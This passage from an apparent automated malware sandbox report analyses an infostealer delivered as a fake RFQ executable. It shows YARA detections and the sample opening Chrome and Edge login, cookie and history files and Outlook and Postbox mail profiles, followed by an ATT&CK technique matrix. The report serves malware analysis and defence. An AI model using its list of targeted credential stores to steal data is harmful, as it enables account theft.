                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Users\user\AppData\Roaming\nDEusQ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Users\user\AppData\Roaming\nDEusQ.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nDEusQ.exe PID: 4524, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory13
                      System Information Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      Security Account Manager11
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets31
                      Virtualization/Sandbox Evasion
                      SSHKeylogging14
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
